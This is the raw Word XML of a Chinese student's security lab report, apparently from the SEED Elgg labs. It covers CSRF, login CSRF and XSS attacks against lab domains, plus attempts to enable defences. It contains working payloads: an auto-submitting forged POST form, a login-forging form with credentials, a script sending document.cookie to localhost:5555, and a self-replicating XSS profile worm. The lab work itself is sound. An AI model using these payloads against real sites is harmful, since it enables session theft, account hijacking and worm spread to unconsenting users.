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信息系统安全实验三 记录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登录后搜索Samy，先打开插件之后，点击添加好友</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="635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查看截获的表单信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="127127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得到的链接为：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http://www.csrflabelgg.com/action/friends/add?friend=45&amp;__elgg_ts=1685894187&amp;__elgg_token=-sgDujGOlO1cOhQ9k-9nug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可以得到Samy的GUID信息</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是45.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根据已知的文件目录，我们在Attacker website目录下添加lm.html文件，脚本如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="2022475"/>
            <wp:effectExtent l="0" t="0" r="317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之后查看到了脚本的链接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22575"/>
            <wp:effectExtent l="0" t="0" r="635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再之后编写邮件发给Alice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="635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Alice收到邮件如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="635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点击之后发现已经添加了Samy为好友！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22575"/>
            <wp:effectExtent l="0" t="0" r="635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此时在http header live上可以看到发送了添加好友的请求！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958465"/>
            <wp:effectExtent l="0" t="0" r="508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实验二：使用POST请求的CSRF攻击！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使用Alice的身份登录并修改自己的个人资料，同时看到在HttpHeaderLIve上抓取到信息如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350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观察url信息如下：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http://www.csrflabelgg.com/action/profile/edit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分析数据包内容，看到修改信息的最后包含需要修改的用户的uid信息，可以得到Alice的UID是42.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="2110105"/>
            <wp:effectExtent l="0" t="0" r="6985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构建html文件如下：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&lt;html&gt;&lt;body&gt;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&lt;h1&gt;This page forges an HTTP POST request.&lt;/h1&gt;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&lt;script type="text/javascript"&gt;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function post(url,fields){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var p = document.createElement("form");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p.action = url;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p.innerHTML = fields;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p.target ="_self";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p.method ="post";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document.body.appendChild(p);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p.submit();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function csrf_post(){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var fields;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fields += "&lt;input type='hidden' name='name' value='alice'&gt;";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fields += "&lt;input type='hidden' name='description' value='Samy is my hero'&gt;";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fields += "&lt;input type='hidden' name='accesslevel[desription]' value='2'&gt;";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fields += "&lt;input type='hidden' name='briefdescription' value=''&gt;";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fields += "&lt;input type='hidden' name='accesslevel[briefdescription]' value='2'&gt;";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fields += "&lt;input type='hidden' name='location' value=''&gt;";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fields += "&lt;input type='hidden' name='accesslevel[location]' value='2'&gt;";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fields += "&lt;input type='hidden' name='guid' value='42'&gt;";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var url ="http://www.csrflabelgg.com/action/profile/edit";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post(url,fields);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window.onload = function() { csrf_post();}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&lt;/script&gt;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&lt;/body&gt;&lt;/html&gt;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166360" cy="28956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Alice收到charlie的邮件！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="6350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点击链接发现alice的主页信息被修改！</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350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3：实现login CSRF攻击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首先以Alice的身份进行登录 并抓取相应的包</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="635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相应的脚本如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;form method="post" action="http://www.csrflabelgg.com/action/login" class="elgg-form elgg-form-login"&gt;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 xml:space="preserve">    &lt;fieldset&gt;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 xml:space="preserve">        &lt;input name="__elgg_token" value="3b7ba29a4a8fa5fb568389c21edf0fca" type="hidden"&gt;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 xml:space="preserve">        &lt;input name="__elgg_ts" value="1527493857" type="hidden"&gt;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 xml:space="preserve">        &lt;div&gt;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 xml:space="preserve">            &lt;label&gt;Username or email&lt;/label&gt;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 xml:space="preserve">            &lt;input value="samy" name="username" class="elgg-input-text elgg-autofocus" type="text"&gt;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 xml:space="preserve">        &lt;/div&gt;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 xml:space="preserve">        &lt;div&gt;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 xml:space="preserve">            &lt;label&gt;Password&lt;/label&gt;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 xml:space="preserve">            &lt;input value="seedsamy" name="password" class="elgg-input-password" type="password"&gt;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 xml:space="preserve">        &lt;/div&gt;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 xml:space="preserve">        &lt;div class="elgg-foot"&gt;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 xml:space="preserve">            &lt;label class="mtm float-alt"&gt;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 xml:space="preserve">                &lt;input name="persistent" value="true" type="checkbox"&gt;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 xml:space="preserve">                Remember me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 xml:space="preserve">            &lt;/label&gt;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 xml:space="preserve">            &lt;input value="Log in" class="elgg-button elgg-button-submit" type="submit"&gt;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 xml:space="preserve">            &lt;ul class="elgg-menu elgg-menu-general mtm"&gt;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 xml:space="preserve">                &lt;li&gt;&lt;a class="registration_link" href="http://www.csrflabelgg.com/register"&gt;Register&lt;/a&gt;&lt;/li&gt;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 xml:space="preserve">                &lt;li&gt;&lt;a class="forgot_link" href="http://www.csrflabelgg.com/forgotpassword"&gt;Lost password&lt;/a&gt;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 xml:space="preserve">                &lt;/li&gt;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 xml:space="preserve">            &lt;/ul&gt;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 xml:space="preserve">        &lt;/div&gt;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 xml:space="preserve">    &lt;/fieldset&gt;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>&lt;/form&gt;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>&lt;script&gt;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 xml:space="preserve">    document.forms[0].submit();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt;/script&gt;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发送邮件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="635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随后点击链接即发现账号切换成了samy的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350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4：防御机制！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在/var/www/CSRF/Elgg/vendor/elgg/engine/classes/Elgg 中修改ActionsService.php文件如下：注释掉return true这一行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="3234690"/>
            <wp:effectExtent l="0" t="0" r="7620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测试任务1：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="120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测试任务2：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350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测试任务3：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6690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="120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XSS实验！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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先打开samy的账户，并打开个人简历，在brief description之中添加脚本如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>document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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>write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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;img src=http://localhost:5555?c=' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>escape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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>document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>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>cookie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Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA1111"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>' &gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">);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Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="981A1A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">/script&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2442845"/>
            <wp:effectExtent l="0" t="0" r="3810" b="107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结果如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="120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Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在Samy的个人介绍中添加脚本如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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>&lt;script type="text/javascript"&gt;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window.onload = function () {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//自动获取ts、token等信息     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var elgg_ts = "&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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var elgg_token = "&amp;__elgg_token=" + elgg.security.token.__elgg_token;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var guid = "&amp;guid=" + elgg.session.user.guid;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var name = "&amp;name=" + elgg.session.user.name;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var desc = "&amp;description=Samy is my hero." + "&amp;accesslevel[description]=2";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var content = elgg_token + elgg_ts + name + desc + guid;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var sendurl = "http://www.xsslabelgg.com/action/profile/edit";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var SamyGUID = "&amp;guid=" + 47;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if (guid != SamyGUID) {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    var Ajax = null;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    Ajax = new XMLHttpRequest();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    Ajax.open("POST", sendurl, true);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    Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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    Ajax.send(content);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}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}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>&lt;/script&gt;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Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17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Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF5500"/>
          <w:kern w:val="0"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17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1868805"/>
            <wp:effectExtent l="0" t="0" r="14605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这里记得要点击右上角的edit HTML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使用Alice访问Samy主页，观察到成功发送了POST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22575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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之后发现Alice成功修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;script id="worm" type="text/javascript"&gt;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window.onload = function () {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var headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;";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var jscodeTag = document.getElementById("worm").innerHTML;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var footerTag = "&lt;/" + "script&gt;"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var wormcode = encodeURIComponent(headerTag + jscodeTag + footerTag);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var elgg_ts = "&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;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var elgg_token = "&amp;__elgg_token=" + elgg.security.token.__elgg_token;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var guid = "&amp;guid=" + elgg.session.user.guid;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var name = "&amp;name=" + elgg.session.user.name;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var desc = "&amp;description=Samy is my hero. (worm)" + wormcode +"&amp;accesslevel[description]=2";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var content = elgg_token + elgg_ts + name + desc + guid;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var sendurl = "http://www.xsslabelgg.com/action/profile/edit";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var SamyGUID = "&amp;guid=" + 47;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if (guid != SamyGUID) {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    var Ajax = null;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    Ajax = new XMLHttpRequest();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    Ajax.open("POST", sendurl, true);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    Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");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  Ajax.send(content);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    }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 xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="1880235"/>
            <wp:effectExtent l="0" t="0" r="317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Alice访问Samy主页 发现POST覆盖Alice主页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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Alice主页被修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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观察到Alice profile也被修改</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="2077085"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1079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077085"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1079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用Charlie的账户访问Alice主页</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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2575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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2575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="12065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Charlie主页也被修改。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尝试打开HTMLawed插件 发现这个插件就开着（即我在这个防护措施开着的情况下完成了以上的所有实验）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而Alice 等人的主页也没有学长说的那种脚本解析成文本的情况出现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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2575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="12065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2575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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822575"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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 w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>改了 但是发现还是没有用！（没有认真改！！）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为没有真正打开防御！！！</w:t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Lucida Console">
    <w:panose1 w:val="020B0609040504020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="8000028F" w:usb1="00001800" w:usb2="00000000" w:usb3="00000000" w:csb0="0000001F" w:csb1="D7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IzMWViYmFiNjg0Zjc1NzIxNjgxMGIxZWQ5MTAzZTYifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="15C35683"/>
    <w:rsid w:val="035937A7"/>
    <w:rsid w:val="03E42333"/>
    <w:rsid w:val="066761DB"/>
    <w:rsid w:val="09941BAA"/>
    <w:rsid w:val="0B4C4C98"/>
    <w:rsid w:val="0DE819AF"/>
    <w:rsid w:val="13556AB7"/>
    <w:rsid w:val="152A0AFF"/>
    <w:rsid w:val="152C0D1B"/>
    <w:rsid w:val="15802E15"/>
    <w:rsid w:val="15C35683"/>
    <w:rsid w:val="170F26A3"/>
    <w:rsid w:val="1D152C33"/>
    <w:rsid w:val="1E255A5D"/>
    <w:rsid w:val="206770AC"/>
    <w:rsid w:val="23F073B8"/>
    <w:rsid w:val="24374FE7"/>
    <w:rsid w:val="29900537"/>
    <w:rsid w:val="2A29674D"/>
    <w:rsid w:val="32E825DF"/>
    <w:rsid w:val="35C4598D"/>
    <w:rsid w:val="37A46016"/>
    <w:rsid w:val="37EB1F18"/>
    <w:rsid w:val="3A1F1E78"/>
    <w:rsid w:val="3C335C3C"/>
    <w:rsid w:val="3D6D517E"/>
    <w:rsid w:val="3D7824A0"/>
    <w:rsid w:val="401E041B"/>
    <w:rsid w:val="409B6EA7"/>
    <w:rsid w:val="41766CF7"/>
    <w:rsid w:val="436D5ED7"/>
    <w:rsid w:val="45C30031"/>
    <w:rsid w:val="46417674"/>
    <w:rsid w:val="47676A71"/>
    <w:rsid w:val="4791488A"/>
    <w:rsid w:val="47BE75C1"/>
    <w:rsid w:val="4D470322"/>
    <w:rsid w:val="4DB34E2F"/>
    <w:rsid w:val="51937451"/>
    <w:rsid w:val="562B40FC"/>
    <w:rsid w:val="56C358D0"/>
    <w:rsid w:val="57AA72A2"/>
    <w:rsid w:val="5ADC0752"/>
    <w:rsid w:val="5B81031A"/>
    <w:rsid w:val="5FEA46E0"/>
    <w:rsid w:val="649C62B2"/>
    <w:rsid w:val="6593581A"/>
    <w:rsid w:val="67BF3E48"/>
    <w:rsid w:val="68490412"/>
    <w:rsid w:val="690F401E"/>
    <w:rsid w:val="69274C15"/>
    <w:rsid w:val="69360540"/>
    <w:rsid w:val="710A33ED"/>
    <w:rsid w:val="74DE3FE1"/>
    <w:rsid w:val="75705230"/>
    <w:rsid w:val="77D5581E"/>
    <w:rsid w:val="785458E3"/>
    <w:rsid w:val="7A097A01"/>
    <w:rsid w:val="7A6B246A"/>
    <w:rsid w:val="7CD73DE6"/>
    <w:rsid w:val="7DA168CE"/>
    <w:rsid w:val="7F5E259D"/>
    <w:rsid w:val="7F802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4"/>
      <w:szCs w:val="13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basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="3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6">
    <w:name w:val="Image Caption"/>
    <w:basedOn w:val="2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1015</Words>
  <Characters>4590</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5737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2023-06-04T07:57:00Z</dcterms:created>
  <dc:creator>国宝小可爱</dc:creator>
  <cp:lastModifiedBy>国宝小可爱</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-06-19T06:16:19Z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218D311D9FB843D9AD4F4EA997AD5520_11</vt:lpwstr>
  </property>
</Properties>
</file>